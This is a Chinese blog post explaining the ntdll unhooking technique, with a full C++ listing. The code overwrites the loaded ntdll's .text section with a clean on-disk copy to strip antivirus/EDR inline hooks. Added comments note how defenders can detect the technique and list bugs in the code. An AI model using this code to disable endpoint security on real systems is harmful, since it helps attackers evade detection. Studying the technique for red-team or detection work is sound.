重新加载.text节拖钩

简介

以前简单介绍过inline hook,杀软会对ntdll进入内核的函数进行挂钩,从而实现检测和阻止,mantvydasb师傅已经对这种技术有详尽的解释,并没有什么特别复杂的操作,只是把ntdll的.text(代码节)进行了读取覆盖。

流程

    1.
    读取ntdll进内存
    2.
    读取覆盖.text节

代码

代码是对mantvydasb师傅拙劣的模仿(直接抄233)。
ps:这里先用 CreateFileMapping 指定 SEC_IMAGE，再用 MapViewOfFile 映射，文件会按 PE 映像的布局直接在内存里展开，所以可以直接拿节头里的 VirtualAddress 作为映射视图中的偏移来读取干净的 .text。
1
#include <Windows.h>
#include <psapi.h>

/*
 * Demonstration of the "reload ntdll .text" pattern described in the post:
 * a second, clean copy of ntdll.dll is mapped from disk as an image
 * (SEC_IMAGE) and its .text section is copied over the .text of the ntdll
 * already loaded in this process, discarding any inline hooks placed there.
 *
 * Defensive view: every step below is observable -- a CreateFile /
 * CreateFileMapping(SEC_IMAGE) of ntdll.dll from outside the loader, a
 * VirtualProtect that makes ntdll's .text PAGE_EXECUTE_READWRITE, and a
 * write into that range. Comparing the in-memory .text of ntdll against the
 * on-disk image (the same comparison this code performs, in reverse) is a
 * common integrity check for spotting both the hooks and their removal.
 *
 * Note: `bool` is used without <stdbool.h>, so this listing is presumably
 * compiled as C++ (the linked reference post is C++).
 */
int main()
{
    MODULEINFO mInfo = { 0 };
    HANDLE hProcess = GetCurrentProcess();   // pseudo-handle for the current process

    //get address of ntdll in virtual memory
    HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
    GetModuleInformation(hProcess, hNtdll, &mInfo, sizeof(mInfo));  // return value is not checked
    LPVOID lpNtdllbase = (LPVOID)mInfo.lpBaseOfDll;  // base of the (possibly hooked) loaded ntdll

    // Open the on-disk ntdll.dll and map it as an image: with SEC_IMAGE the
    // view is laid out like a loaded module, so section RVAs taken from the
    // loaded copy can be used as offsets into this view as well. None of the
    // three results are checked for INVALID_HANDLE_VALUE / NULL before use.
    HANDLE hNtdllfile = CreateFileA("c:\\windows\\system32\\ntdll.dll", GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
    HANDLE hNtdllMapping = CreateFileMapping(hNtdllfile, NULL, PAGE_READONLY | SEC_IMAGE, 0, 0, NULL);
    LPVOID lpNtdllmaping = MapViewOfFile(hNtdllMapping, FILE_MAP_READ, 0, 0, 0);

    // Walk the PE headers of the loaded ntdll to reach its section table.
    PIMAGE_DOS_HEADER pDosheader = (PIMAGE_DOS_HEADER)lpNtdllbase;
    PIMAGE_NT_HEADERS pNtheader = (PIMAGE_NT_HEADERS)((DWORD_PTR)lpNtdllbase + pDosheader->e_lfanew);

    for (WORD i = 0; i < pNtheader->FileHeader.NumberOfSections; i++) {
        PIMAGE_SECTION_HEADER pSectionheader = (PIMAGE_SECTION_HEADER)((DWORD_PTR)IMAGE_FIRST_SECTION(pNtheader) + ((DWORD_PTR)IMAGE_SIZEOF_SECTION_HEADER * i));

        // Section Name is an 8-byte field that is not guaranteed to be
        // NUL-terminated; strcmp here relies on the zero padding of short names.
        if (!strcmp((char*)pSectionheader->Name, (char*)".text")) {
            DWORD oldProtection = 0;
            // Make the loaded .text writable (and executable), overwrite it with
            // the same RVA range from the clean mapped image, then attempt to
            // restore the previous protection. isProtected is assigned but never
            // read, so a failure of either VirtualProtect call goes unnoticed.
            bool isProtected = VirtualProtect((LPVOID)((DWORD_PTR)lpNtdllbase + (DWORD_PTR)pSectionheader->VirtualAddress), pSectionheader->Misc.VirtualSize, PAGE_EXECUTE_READWRITE, &oldProtection);
            memcpy((LPVOID)((DWORD_PTR)lpNtdllbase + (DWORD_PTR)pSectionheader->VirtualAddress), (LPVOID)((DWORD_PTR)lpNtdllmaping + (DWORD_PTR)pSectionheader->VirtualAddress), pSectionheader->Misc.VirtualSize);
            isProtected = VirtualProtect((LPVOID)((DWORD_PTR)lpNtdllbase + (DWORD_PTR)pSectionheader->VirtualAddress), pSectionheader->Misc.VirtualSize, oldProtection, NULL);
        }
    }

    // Cleanup. Review notes: lpNtdllmaping is a view pointer, not a handle --
    // the matching release call is UnmapViewOfFile; hNtdllMapping (the section
    // handle) is never closed; hProcess is a pseudo-handle, so CloseHandle on
    // it does nothing; FreeLibrary on a module handle obtained with
    // GetModuleHandleA releases a reference that was never taken (in practice
    // harmless for ntdll, which the loader keeps resident, but wrong in general).
    CloseHandle(hProcess);
    CloseHandle(hNtdllfile);
    CloseHandle(lpNtdllmaping);
    FreeLibrary(hNtdll);

    return 0;
}

LINKS

Full DLL Unhooking with C++
Red Teaming Techniques & Experiments